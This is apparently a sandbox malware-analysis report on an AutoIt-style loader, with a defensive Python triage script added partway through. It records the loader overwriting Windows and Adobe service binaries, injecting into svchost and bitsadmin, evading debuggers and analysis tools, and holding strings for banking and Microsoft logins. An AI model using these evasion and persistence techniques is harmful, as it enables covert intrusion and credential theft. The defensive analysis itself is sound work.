Source: Binary string: wntdll.pdb | source: 1SxKeB4u0c.exe, 00000000.00000003.1452279000.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, 1SxKeB4u0c.exe, 00000000.00000003.1441801356.0000000004250000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000003.00000002.1682889494.00000000030FE000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1682889494.0000000002F60000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1586104823.0000000000C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1583925733.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, bitsadmin.exe, 00000007.00000003.1684871418.00000000037BB000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000002.3897569853.0000000003B0E000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000003.1682483471.000000000360E000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000002.3897569853.0000000003970000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: ALG.pdb | source: 1SxKeB4u0c.exe, 00000000.00000003.1437010006.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp, alg.exe.0.dr
Source: alg.exe.0.dr | Static PE information: 0xF67E8745 [Tue Jan 18 10:28:21 2101 UTC]
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_00404B37 LoadLibraryA,GetProcAddress
Source: armsvc.exe.0.dr | Static PE information: section name: .didat
Source: alg.exe.0.dr | Static PE information: section name: .didat
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_00428945 push ecx; ret 0_2_00428958
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_00402F12 push es; retf 0_2_00402F13
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_02F1520C push 02F1528Fh; ret 0_2_02F1522D
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_02F1B180 push 02F1B0CAh; ret 0_2_02F1B061
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_02F1B180 push 02F1B30Dh; ret 0_2_02F1B1E6
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_02F1B180 push 02F1B2F2h; ret 0_2_02F1B262
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_02F1B180 push 02F1B255h; ret 0_2_02F1B2ED
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_02F1B180 push 02F1B2D0h; ret 0_2_02F1B346
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_02F1B180 push 02F1B37Fh; ret 0_2_02F1B3B7
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_02F38550 push 02F3852Eh; ret 0_2_02F37F3A
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_02F38550 push 02F38514h; ret 0_2_02F37F66
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_02F38550 push 02F37E66h; ret 0_2_02F38057
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_02F38550 push 02F3817Ah; ret 0_2_02F3808B
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_02F38550 push 02F382E5h; ret 0_2_02F380D9
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_02F38550 push 02F3826Ah; ret 0_2_02F3819E
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_02F38550 push 02F3849Ch; ret 0_2_02F381E4
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_02F38550 push 02F38321h; ret 0_2_02F382E0
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_02F38550 push 02F37FBFh; ret 0_2_02F3831F
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_02F38550 push 02F37FA8h; ret 0_2_02F3834C
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_02F38550 push 02F384BAh; ret 0_2_02F383E2
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_02F38550 push 02F38426h; ret 0_2_02F384D8
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_02F38550 push 02F38075h; ret 0_2_02F384FD
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_02F38550 push 02F3808Ch; ret 0_2_02F38512
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_02F38550 push 02F38D45h; ret 0_2_02F387D3
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_02F38550 push 02F38AB5h; ret 0_2_02F38B13
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_02F38550 push 02F38784h; ret 0_2_02F38CA1
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_02F38550 push 02F38DC9h; ret 0_2_02F38E1C
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_02F38550 push 02F38D14h; ret 0_2_02F38E2E
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_02F38550 push 02F38674h; ret 0_2_02F38E4D
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_02F38550 push 02F388A6h; ret 0_2_02F38F76
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_02F38550 push 02F3868Ch; ret 0_2_02F38FA4
                Source: 1SxKeB4u0c.exeStatic PE information: section name: .reloc entropy: 7.938061157054464
                Source: AppVClient.exe.0.drStatic PE information: section name: .reloc entropy: 7.9430060247567535

                Persistence and Installation Behavior

                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeSystem file written: C:\Windows\System32\AppVClient.exeJump to behavior
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeSystem file written: C:\Windows\System32\alg.exeJump to behavior
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeFile created: C:\Windows\System32\AppVClient.exeJump to dropped file
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to dropped file
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeFile created: C:\Windows\System32\alg.exeJump to dropped file
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_02F3CBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,0_2_02F3CBD0
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_004048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_004048D7
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_00485376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00485376
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_00423187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00423187
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
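
The "Source:" rows in this report are the raw material a responder turns into host checks (which service binaries were overwritten, which processes read the PEB, which threads slept their way past the analysis window). The following script, added here as an example and not part of Joe Sandbox or of the report, parses rows in exactly the glued-together form the text extraction produced (process path, evidence label and detail concatenated, with the "Jump to behavior" link text on the end) and aggregates them. The evidence labels it recognises are the ones visible in this report; the list of analysis-tool names and the set of service APIs it flags are assumptions, and the sample rows are copied from the Persistence and Installation Behavior and Malware Analysis System Evasion sections of this report.

```python
"""Triage helper for the "Source: ..." evidence rows of a Joe Sandbox report.

The text extraction glued three table cells together per row, e.g.
"...1SxKeB4u0c.exeFile written: C:\\...\\armsvc.exeJump to behavior", so the
parser splits on the known evidence labels instead of on whitespace.
"""
import re
from collections import Counter

# Labels seen in this report's rows; longest first so "System file written"
# is matched whole rather than cut at "File written".
EVIDENCE_LABELS = sorted((
    "File written", "System file written", "File created",
    "Dropped PE file which has not been started", "Code function",
    "Process information set", "Process queried", "Thread sleep time",
    "Thread sleep count", "Binary or memory string", "Static PE information",
    "API coverage", "API/Special instruction interceptor",
), key=len, reverse=True)
TRAILERS = ("Jump to behavior", "Jump to dropped file")  # link text glued to rows
# Assumption: tool names a sandbox-aware sample commonly looks for.
ANALYSIS_TOOLS = {"PROCMON.EXE", "WIRESHARK.EXE", "X64DBG.EXE", "OLLYDBG.EXE"}
# Assumption: APIs whose presence in a chain means service (re)configuration.
SERVICE_APIS = {"ChangeServiceConfigW", "StartServiceW", "CreateServiceW"}

LABEL_RE = re.compile("(" + "|".join(re.escape(l) for l in EVIDENCE_LABELS) + r"):\s*")
# "0_2_00473F09 BlockInput,0_2_00473F09": the function id brackets the body.
FUNC_RE = re.compile(r"^(?P<fn>\d+_\d+_[0-9A-Fa-f]+)\s+(?P<body>.*?),?(?P=fn)$")
PEB_RE = re.compile(r"fs:\[0*30h\]", re.IGNORECASE)  # TEB+0x30 holds the PEB pointer


def parse_row(line):
    """Split one row into source process, thread id, evidence label and detail."""
    s = line.strip()
    if not s.startswith("Source:"):
        return None
    s = s[len("Source:"):].strip()
    for trailer in TRAILERS:
        if s.endswith(trailer):
            s = s[:-len(trailer)].rstrip()
    m = LABEL_RE.search(s)
    if m is None:
        return None
    source, tid = s[:m.start()].strip(), None
    tm = re.search(r"\s+TID:\s*(\d+)$", source)  # "bitsadmin.exe TID: 3500"
    if tm:
        source, tid = source[:tm.start()], int(tm.group(1))
    return {"source": source, "tid": tid, "label": m.group(1), "detail": s[m.end():].strip()}


def triage(lines):
    """Aggregate rows into the facts a responder checks first on the host."""
    out = {"dropped_files": set(), "system_files_written": set(),
           "service_api_chains": [], "peb_reads_by_process": Counter(),
           "long_sleeps": [], "debugger_queries": set(), "analysis_tool_strings": set()}
    for line in lines:
        row = parse_row(line)
        if row is None:
            continue
        proc, label, detail = row["source"], row["label"], row["detail"]
        if label in ("File written", "File created", "Dropped PE file which has not been started"):
            out["dropped_files"].add(detail)
        elif label == "System file written":          # overwritten service binaries
            out["system_files_written"].add(detail)
        elif label == "Code function":
            fm = FUNC_RE.match(detail)
            if fm is None:
                continue
            body = fm.group("body")
            if PEB_RE.search(body):                    # PEB read == anti-debug check
                out["peb_reads_by_process"][proc] += 1
            apis = body.split(",")
            if SERVICE_APIS.intersection(apis):
                out["service_api_chains"].append((proc, fm.group("fn"), apis))
        elif label == "Thread sleep time":
            # "-2934000s >= -30000s": first number is the accumulated sleep, as printed
            sm = re.match(r"-?(\d+)s", detail)
            if sm and int(sm.group(1)) >= 30000:
                out["long_sleeps"].append((proc, row["tid"], int(sm.group(1))))
        elif label == "Process queried" and "DebugPort" in detail:
            out["debugger_queries"].add(proc)
        elif label == "Binary or memory string":
            for tool in ANALYSIS_TOOLS:
                if tool in detail.upper():
                    out["analysis_tool_strings"].add(tool)
    return out


# Rows copied from this report (constructed input for the example).
SAMPLE_ROWS = [
    r"Source: C:\Users\user\Desktop\1SxKeB4u0c.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior",
    r"Source: C:\Users\user\Desktop\1SxKeB4u0c.exeSystem file written: C:\Windows\System32\alg.exeJump to behavior",
    r"Source: C:\Users\user\Desktop\1SxKeB4u0c.exeFile created: C:\Windows\System32\AppVClient.exeJump to dropped file",
    r"Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_02F3CBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,0_2_02F3CBD0",
    r"Source: 1SxKeB4u0c.exe, 00000000.00000003.1430895740.0000000000AD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE",
    r"Source: C:\Windows\SysWOW64\bitsadmin.exe TID: 3500Thread sleep time: -2934000s >= -30000sJump to behavior",
    r"Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FA02E1 mov eax, dword ptr fs:[00000030h]3_2_02FA02E1",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03068324 mov ecx, dword ptr fs:[00000030h]3_2_03068324",
    r"Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_00574594 mov eax, dword ptr fs:[00000030h]0_2_00574594",
]

if __name__ == "__main__":
    for key, value in triage(SAMPLE_ROWS).items():
        print(f"{key}: {value}")
```

Feed it the report text (`triage(open("report.txt").readlines())`) and the `system_files_written` set is the list of binaries to hash and signature-check on the host, `service_api_chains` tells you which function reconfigured and started the service that loads them, and `peb_reads_by_process` separates the injected svchost.exe payload from the AutoIt loader. The script deliberately treats only an explicit tool name (here PROCMON.EXE) as evidence of analysis-tool detection: the "Hyper-V RAW" strings in this report sit next to `%SystemRoot%\system32\mswsock.dll`, which is where that Winsock provider name lives on an ordinary Windows host, so counting them as a VM check would overstate what the sample does.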

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeAPI/Special instruction interceptor: Address: A8B58C
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD324
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD7E4
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD944
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD504
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD544
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD1E4
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI/Special instruction interceptor: Address: 7FFBCB7B0154
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI/Special instruction interceptor: Address: 7FFBCB7ADA44
                Source: 1SxKeB4u0c.exe, 00000000.00000003.1430895740.0000000000AD4000.00000004.00000020.00020000.00000000.sdmp, 1SxKeB4u0c.exe, 00000000.00000003.1431048103.0000000000B40000.00000004.00000020.00020000.00000000.sdmp, 1SxKeB4u0c.exe, 00000000.00000002.1454691196.0000000000B40000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FD096E rdtsc 3_2_02FD096E
                Source: C:\Windows\SysWOW64\bitsadmin.exeWindow / User API: threadDelayed 1467Jump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeWindow / User API: threadDelayed 8507Jump to behavior
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeDropped PE file which has not been started: C:\Windows\System32\AppVClient.exeJump to dropped file
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_0-110939
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeAPI coverage: 4.7 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.6 %
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI coverage: 2.6 %
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exe TID: 1384Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exe TID: 3500Thread sleep count: 1467 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exe TID: 3500Thread sleep time: -2934000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exe TID: 3500Thread sleep count: 8507 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exe TID: 3500Thread sleep time: -17014000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_0046445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0046445A
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_0046C6D1 FindFirstFileW,FindClose,0_2_0046C6D1
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_0046C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0046C75C
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_0046EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0046EF95
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_0046F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0046F0F2
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_0046F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0046F3F3
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_004637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_004637EF
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_00463B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00463B12
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_0046BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0046BCBC
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_0327C640 FindFirstFileW,FindNextFileW,FindClose,7_2_0327C640
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_004049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_004049A0
                Source: z5f52P3-.7.drBinary or memory string: ms.portal.azure.comVMware20,11696494690
                Source: z5f52P3-.7.drBinary or memory string: discord.comVMware20,11696494690f
                Source: z5f52P3-.7.drBinary or memory string: AMC password management pageVMware20,11696494690
                Source: z5f52P3-.7.drBinary or memory string: outlook.office.comVMware20,11696494690s
                Source: z5f52P3-.7.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                Source: z5f52P3-.7.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                Source: z5f52P3-.7.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                Source: z5f52P3-.7.drBinary or memory string: interactivebrokers.comVMware20,11696494690
                Source: z5f52P3-.7.drBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                Source: z5f52P3-.7.drBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                Source: z5f52P3-.7.drBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                Source: z5f52P3-.7.drBinary or memory string: outlook.office365.comVMware20,11696494690t
                Source: 1SxKeB4u0c.exe, 00000000.00000002.1454499072.0000000000ABA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: z5f52P3-.7.drBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                Source: z5f52P3-.7.drBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                Source: LbtMpScwNRqrVB.exe, 00000008.00000002.3897089325.0000000000F5F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^
                Source: z5f52P3-.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                Source: 1SxKeB4u0c.exe, 00000000.00000002.1454499072.0000000000A8C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
                Source: z5f52P3-.7.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                Source: z5f52P3-.7.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                Source: bitsadmin.exe, 00000007.00000002.3894745583.0000000003402000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: z5f52P3-.7.drBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                Source: z5f52P3-.7.drBinary or memory string: tasks.office.comVMware20,11696494690o
                Source: z5f52P3-.7.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                Source: z5f52P3-.7.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                Source: z5f52P3-.7.drBinary or memory string: dev.azure.comVMware20,11696494690j
                Source: z5f52P3-.7.drBinary or memory string: global block list test formVMware20,11696494690
                Source: z5f52P3-.7.drBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                Source: z5f52P3-.7.drBinary or memory string: bankofamerica.comVMware20,11696494690x
                Source: z5f52P3-.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                Source: z5f52P3-.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                Source: z5f52P3-.7.drBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                Source: z5f52P3-.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                Source: z5f52P3-.7.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                Source: z5f52P3-.7.drBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                Source: firefox.exe, 0000000A.00000002.1981365226.000001B8AA5AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllXX
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeAPI call chain: ExitProcess graph end node graph_0-108765
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FD096E rdtsc 3_2_02FD096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00437B23 LdrLoadDll,3_2_00437B23
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_00473F09 BlockInput,0_2_00473F09
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_00403B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00403B3A
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_00435A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00435A7C
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_00404B37 LoadLibraryA,GetProcAddress,0_2_00404B37
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_00574594 mov eax, dword ptr fs:[00000030h]0_2_00574594
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_00A8A1B8 mov eax, dword ptr fs:[00000030h]0_2_00A8A1B8
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_00A8B7F8 mov eax, dword ptr fs:[00000030h]0_2_00A8B7F8
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_00A8B858 mov eax, dword ptr fs:[00000030h]0_2_00A8B858
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_02F11130 mov eax, dword ptr fs:[00000030h]0_2_02F11130
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_02F53F3D mov eax, dword ptr fs:[00000030h]0_2_02F53F3D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FA02E1 mov eax, dword ptr fs:[00000030h]3_2_02FA02E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03068324 mov eax, dword ptr fs:[00000030h]3_2_03068324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03068324 mov ecx, dword ptr fs:[00000030h]3_2_03068324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02F9A2C3 mov eax, dword ptr fs:[00000030h]3_2_02F9A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03012349 mov eax, dword ptr fs:[00000030h]3_2_03012349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306634F mov eax, dword ptr fs:[00000030h]3_2_0306634F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03038350 mov ecx, dword ptr fs:[00000030h]3_2_03038350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0305A352 mov eax, dword ptr fs:[00000030h]3_2_0305A352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FA02A0 mov eax, dword ptr fs:[00000030h]3_2_02FA02A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0301035C mov eax, dword ptr fs:[00000030h]3_2_0301035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0301035C mov ecx, dword ptr fs:[00000030h]3_2_0301035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FCE284 mov eax, dword ptr fs:[00000030h]3_2_02FCE284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303437C mov eax, dword ptr fs:[00000030h]3_2_0303437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02F8826B mov eax, dword ptr fs:[00000030h]3_2_02F8826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02F94260 mov eax, dword ptr fs:[00000030h]3_2_02F94260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02F96259 mov eax, dword ptr fs:[00000030h]3_2_02F96259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02F8A250 mov eax, dword ptr fs:[00000030h]3_2_02F8A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030163C0 mov eax, dword ptr fs:[00000030h]3_2_030163C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02F8823B mov eax, dword ptr fs:[00000030h]3_2_02F8823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0304C3CD mov eax, dword ptr fs:[00000030h]3_2_0304C3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030343D4 mov eax, dword ptr fs:[00000030h]3_2_030343D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303E3DB mov eax, dword ptr fs:[00000030h]3_2_0303E3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303E3DB mov ecx, dword ptr fs:[00000030h]3_2_0303E3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FC63FF mov eax, dword ptr fs:[00000030h]3_2_02FC63FF
